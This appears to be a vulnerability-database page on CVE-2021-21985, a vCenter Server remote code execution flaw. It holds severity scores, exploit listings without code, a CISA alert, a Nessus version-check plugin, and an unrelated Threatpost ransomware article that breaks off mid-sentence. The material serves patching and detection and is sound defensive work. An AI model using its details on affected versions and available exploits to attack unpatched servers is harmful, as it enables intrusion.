The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
{"githubexploit": [{"lastseen": "2021-12-10T15:27:58", "description": "# CVE-2021-21985\nThe vSphere Client (HTML5) contains a remote co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-27T02:28:48", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-05-27T14:19:48", "id": "CF2E9209-48FF-5375-8638-93E7CC964EB3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:24:39", "description": "# cve-2021-21985 exploit\n\n## 0x01 \u6f0f\u6d1e\u70b9\n\n![image-20210603144442312...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T12:17:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-08-15T19:04:14", "id": "C1631982-501B-5433-8360-6D33D931706B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T21:20:59", "description": "# CVE-2021-21985 (Vulnerable Code) \n\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0376", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21985", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-10T19:22:13", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "nessus", "title": "VMWare vCenter Server 6.5 < 6.5 U3p / 6.7 < 6.7 U3n / 7.0 < 7.0 U2b Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113244", "href": "https://www.tenable.com/plugins/was/113244", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:27", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U2b, 6.7 before 6.7 U3n, and 6.5 before 6.5 U3p) and VMware Cloud Foundation (4.x before 4.2.1 and 3.x before 3.10.2.1).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "VMware vCenter Server Virtual SAN Health Check plug-in RCE (CVE-2021-21985) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21985.NBIN", "href": "https://www.tenable.com/plugins/nessus/150163", "sourceData": "Binary data vmware_vcenter_cve-2021-21985.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:13", "description": "The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3p, 6.7 prior to 6.7 U3n or 7.0 prior to 7.0 U2b. It is, therefore, affected by multiple vulnerabilities:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. (CVE-2021-21985)\n\n - The vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. A malicious actor with network access to port 443 on vCenter Server may perform actions allowed by the impacted plug-ins without authentication. (CVE-2021-21986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. Nessus has also not tested for the presence of a workaround.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "nessus", "title": "VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0010)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_VMSA-2021-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/149902", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149902);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2021-21985\", \"CVE-2021-21986\");\n script_xref(name:\"IAVA\", value:\"2021-A-0254\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0027\");\n\n script_name(english:\"VMware vCenter Server 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2021-0010)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization management application installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server installed on the remote host is 6.5 prior to 6.5 U3p, 6.7 prior to 6.7 U3n or 7.0\nprior to 7.0 U2b. It is, therefore, affected by multiple vulnerabilities:\n\n - The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the\n Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network\n access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying\n operating system that hosts vCenter Server. (CVE-2021-21985)\n\n - The vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN\n Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. A\n malicious actor with network access to port 443 on vCenter Server may perform actions allowed by the impacted\n plug-ins without authentication. (CVE-2021-21986)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber. Nessus has also not tested for the presence of a workaround.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server 6.5 U3p, 6.7 U3n, 7.0 U2b or later or apply the workaround mentioned in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21986\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vCenter Server Virtual SAN Health Check Plugin RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_detect.nbin\");\n script_require_keys(\"Host/VMware/vCenter\", \"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::vmware_vcenter::get_app_info();\n\nvar constraints = [\n { 'min_version' : '6.5', 'fixed_version' : '6.5.17994927', 'fixed_display' : '6.5 U3p' },\n { 'min_version' : '6.7', 'fixed_version' : '6.7.17713311', 'fixed_display' : '6.7 U3n' },\n { 'min_version' : '7.0', 'fixed_version' : '7.0.17958471', 'fixed_display' : '7.0 U2b' },\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-06-05T18:17:48", "description": "CISA is aware of the likelihood that cyber threat actors are attempting to exploit CVE-2021-21985, a remote code execution vulnerability in VMware vCenter Server and VMware Cloud Foundation. Although patches were made [available](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) on May 25, 2021, unpatched systems remain an attractive target and attackers can exploit this vulnerability to take control of an unpatched system.\n\nCISA encourages users and administrators to review VMware\u2019s [VMSA-2021-010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), [blogpost](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>), and [FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>) for more information about the vulnerability and apply the necessary updates as soon as possible, even if out-of-cycle work is required. If an organization cannot immediately apply the updates, then apply the [workarounds](<https://kb.vmware.com/s/article/83829>) in the interim. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "cisa", "title": "Unpatched VMware vCenter Software", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-06-04T00:00:00", "id": "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-29T00:41:11", "description": "So much for darkened servers at the headquarters of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) or [REvil](<https://threatpost.com/ransomware-revil-sites-disappears/167745/>) ransomware groups. Turns out, we\u2019ve got either their rebranded versions or two new ransomware gangs to contend with.\n\nThe first new group to appear this month was Haron, and the second is named BlackMatter. As [Ars Technica](<https://arstechnica.com/gadgets/2021/07/july-has-already-brought-us-2-new-ransomware-groups-hunting-for-big-game/?comments=1>)\u2018s Dan Goodin points out, there may be more still out there.\n\nThey\u2019re both claiming to be focused on targets with deep pockets that can pay ransoms in the millions of dollars. They\u2019re also virtue-signaling a la DarkSide, with similar language about sparing hospitals, critical infrastructure, nonprofits, etc.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nBlackMatter also promised free decryption if its affiliates screw up and kill kittens or freeze files at, say, pipeline companies, as happened when [Colonial Pipeline was attacked by DarkSide](<https://threatpost.com/colonial-pipeline-ransomware-emergency-declaration/165977/>) in May.\n\n## Haron & Its Cut-and-Paste Ransom Note\n\nThe first sample of the Haron malware was submitted to [VirusTotal](<https://www.virustotal.com/gui/file/6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c/detection>) on July 19. Three days later, the South Korean security firm S2W Lab reported on the group in a [post](<https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4>) that laid out similarities between Haron and Avaddon.\n\nAvaddon is yet another prolific ransomware-as-a-service (RaaS) provider that [evaporated](<https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/>) in June rather than face the legal heat that followed Colonial Pipeline and other big ransomware attacks. At the time, Avaddon [released its decryption keys](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) to BleepingComputer \u2013 2,934 in total \u2013 with each key belonging to an individual victim. According to law enforcement, the average extortion fee Avaddon demanded was about $40,000, meaning the ransomware operators and their affiliates quit and walked away from millions.\n\n## Or Did They?\n\nIn its July 22 post, S2W Lab said that when infected with Haron ransomware, \u201cthe extension of the encrypted file is changed to the victim\u2019s name.\u201d Haron is also similar to Avaddon ransomware in that its operators are using a ransom note and operating their own leak site. In its post, S2W provided side-by-side images of ransom notes from the two gangs.\n\nAs you can see below, the two ransom notes read like a cut-and-paste job. S2W Lab noted that the main difference is that Haron suggests a specific ID and Password for victims to log in to the negotiation site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28120546/Haron-Avaddon-ransom-notes.png>)\n\nRansom notes from Avaddon and Haron. Source: S2W Lab.\n\nThere are loads of other similarities between Haron and Avaddon, including:\n\n * Yet more cut-and-paste verbiage on the two negotiation sites.\n * Nearly identical appearances of the negotiation sites, besides the ransomware name of \u201cAvaddon\u201d being swapped for \u201cHaron.\u201d\n * Identical chunks of open-source JavaScript code used for chat that was previously published on a Russian developer forum.\n * The two leak sites share the same structure.\n\nIf Haron is Avaddon reborn, the new bottles for the old wine include a strategy to induce negotiations by setting a time for the next data update. Another difference: no [triple-threat play](<https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat>) to be seen from Haron, at least not yet. In triple-threat attacks, not only is data encrypted locally and exfiltrated before the ransom demand is made, but recalcitrant victims are also subjected to threats of distributed denial-of-service (DDoS) attack until they yield.\n\nAlso, Haron has shrunk the negotiation time to six days, whereas Avaddon allotted 10 days for negotiation. Another difference is in the engines running the two ransomwares: S2W Lab said that Haron is running on the [Thanos](<https://threatpost.com/thanos-ransomware-weaponize-riplace-tactic/156438/>) ransomware \u2013 a \u201cRansomware Affiliate Program,\u201d similar to a ransomware-as-a-service (RaaS), that\u2019s been sold since 2019 \u2013 whereas Avaddon was written in C++.\n\nNone of the similarities are solid proof of Avaddon having risen from the ashes like a ransomware phoenix: They could simply point to one or more threat actors from Avaddon working on a reboot, or they could point to nothing at all.\n\n\u201cIt is difficult to conclude that Haron is a re-emergence of Avaddon based on our analysis,\u201d according to S2W\u2019s writeup, which pointed out that \u201cAvaddon developed and used their own C++ based ransomware,\u201d whereas the publicly available Thanos ransomware that Haron is using is baked on C#.\n\nSentinelOne\u2019s Jim Walter told Ars that he\u2019s seen what look like similarities between Avaddon and Haron samples, but he\u2019ll know more soon.\n\nAs of July 22, Haron\u2019s leak site had only disclosed one victim.\n\n## BlackMatter\n\nThe second ransomware newbie calls itself BlackMatter. News about the new network was reported on Tuesday by security firm Recorded Future \u2013 which labeled it a [successor to DarkSide and REvil](<https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/>) \u2013 and by its news arm, [The Record](<https://therecord.media/blackmatter-ransomware-targets-companies-with-revenues-of-100-million-and-more/>). Risk intelligence firm Flashpoint also [spotted the newcomer](<https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/>), noting that BlackMatter registered an account on the Russian-language underground forums XSS and Exploit on July 19 and deposited 4 bitcoins (approximately $150,000 USD as of Wednesday afternoon) into its Expoit escrow account.\n\nBoth of those forums [banned ransomware discussion](<https://threatpost.com/darkside-toshiba-xss-bans-ransomware/166210/>) in May, following DarkSide\u2019s attack on Colonial Pipeline. In the wake of that catastrophic shutdown, which sparked gas hoarding along the East coast and an emergency order from the federal government, REvil instituted pre-moderation for its partner network, saying that it would ban any attempt to attack any government, public, educational or healthcare organizations.\n\nReferring to DarkSide\u2019s experience, REvil\u2019s backers said that the group was \u201cforced to introduce\u201d these \u201csignificant new restrictions,\u201d promising that affiliates that violated the new rules would be kicked out and that it would give out decryption tools for free.\n\nFlashpoint noted that the large deposit on the Exploit forum shows that BlackMatter is serious.\n\nOn July 21, the threat actor said that the network is looking to buy access to affected networks in the U.S., Canada, Australia, and the UK, presumably for ransomware operations. It\u2019s offering up to $100,000 for network access, as well as a cut of the ransom take.\n\n## Putting Up Big Money for Big Fish\n\nBlackMatter is putting up big money because it\u2019s after big fish. The group said that it was looking for deep-pocketed organizations with revenues of more than $100 million: the size of organizations that could be expected to pay big ransoms. The threat actor is also requiring that targets have 500-15,000 hosts in their networks. It\u2019s also up for all industries, except for healthcare and governments.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28133422/BlackMatter-post-on-Exploit-e1627493683950.png>)\n\nBlackMatter ad on the Exploit underground forum. Source: Recorded Future.\n\n## \u2018We Are Ethical Blood Suckers\u2019\n\nThat\u2019s where the virtual signaling comes in. The Record reports that BlackMatter\u2019s leak site is currently empty, which means that BlackMatter only launched this week and hasn\u2019t yet carried out any network penetrations.\n\nWhen it does go after victims, the list won\u2019t include a roster of target types that is currently, supposedly, taboo to target. A section of BlackMatter\u2019s leak site lists the type of targets that are off-limits, including:\n\n * Hospitals\n * Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)\n * Oil and gas industry (pipelines, oil refineries)\n * Defense industry\n * Non-profit companies\n * Government sector\n\nSound familiar? That\u2019s because it\u2019s a dead ringer for a list formerly provided on the leak site of the DarkSide gang before it supposedly went belly-up following the Colonial attack. Promises not to attack these types of organizations aren\u2019t always adhered to by these gangs\u2019 affiliates, but BlackMatter has promised that if victims from those industries are attacked, the operators will decrypt their data for free.\n\n## Buying Legitimacy\n\nMike Fowler, vice president of intelligence services at GroupSense \u2013 a firm that offers threat intelligence and [ransom negotiation](<https://threatpost.com/whats-next-revil-victims/167926/>) \u2013 has been keeping an eye on BlackMatter. He told Threatpost on Wednesday that lately, there\u2019s been an evolution in tactics, techniques and processes (TTP) used by emerging RaaS cartels such as [Hive](<https://blogs.blackberry.com/en/2021/07/threat-thursday-hive-ransomware>), [Grief](<https://securityaffairs.co/wordpress/118446/cyber-crime/prometheus-grief-ransomware.html>) and, most recently, BlackMatter: an evolution reminiscent of the [2020 shift to double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by [Maze](<https://threatpost.com/maze-ransomware-cognizant/154957/>).\n\n\u201cGroupSense has witnessed an expected jockeying for position and brand awareness within the RaaS cartels,\u201d Fowler said in an email. \u201cThis was clearly evidenced by BlackMatter\u2019s account registration on the top two cybercrime forums. Their deposit of 4 Bitcoins into their escrow account on the largest Russian cybercrime forum, Exploit, is clearly an attempt to purchase legitimacy.\u201d\n\n## Careful Victim Targeting\n\nDigital Shadows\u2019 Sean Nikkel told Threatpost on Wednesday that the careful selection of big companies reflects the increasing number of threat actors that are \u201cdoing their due diligence\u201d when it comes to selecting victims.\n\n\u201cWe\u2019ve seen time and again when they have some knowledge around key personalities within an organization, revenue, size, and even customers, so the idea of big game hunting seems to be in line with observed ransomware trends,\u201d Nikkel said via email.\n\nHe called the virtue signaling and promise to do right by the exempted industries an \u201cinteresting twist.\u201d\n\n\u201cWhile REvil had publicly stated that everything was fair game previously, maybe this cooling-off period from previous attention has forced a change of heart, if it is indeed them coming back,\u201d Nikkel added.\n\n\u201cInteresting\u201d is one way to frame it. Another way to look at it is as squeaking from blood-sucking parasites, as a commenter on Ars\u2019 coverage suggested:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/28095200/nehinks-tick-comment-e1627480332556.jpg>)\n\nNeither was GroupSense\u2019s Fowler impressed by BlackMatter\u2019s \u201cpinky promise\u201d not to victimize certain business segments. He said it rings particularly hollow \u201cgiven their rise to prominence as REvil\u2019s standing as the #2 RaaS fades into obscurity.\u201d\n\nStill, to put it all into perspective, while BlackMatter is \u201cthe flavor of the day,\u201d Fowler says that other RaaS services, such as Conti, Grief, Hive and LockBit, are \u201cjust as big a threat.\u201d\n\n## Ransomware Phoenixes or New Ratbags? Time Will Tell\n\nDirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost on Wednesday that anybody who didn\u2019t see REvil or DarkSide re-emerging might not have their head screwed on right. There\u2019s a \u201cgood chance\u201d that REvil decided proactively \u201cto take down everything and to re-emerge, just to make tracking and tracing even more difficult,\u201d he added in an email.\n\nMeanwhile, whatever sabre-rattling the Biden administration has been doing at Russia or China about kinetic responses and hack-backs won\u2019t change the situation, Schrader predicted. As it is, the threat actors are refining their approaches to look at targets that have \u201ca higher motivation\u201d to pay ransom, cases in point being [Kaseya](<https://threatpost.com/zero-days-kaseya-unitrends-backup-servers/168180/>) and [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>).\n\n\u201cRansomware groups will continue to look for attack vectors that are likely to have a higher motivation for payment, and that is the next evolution in this business,\u201d 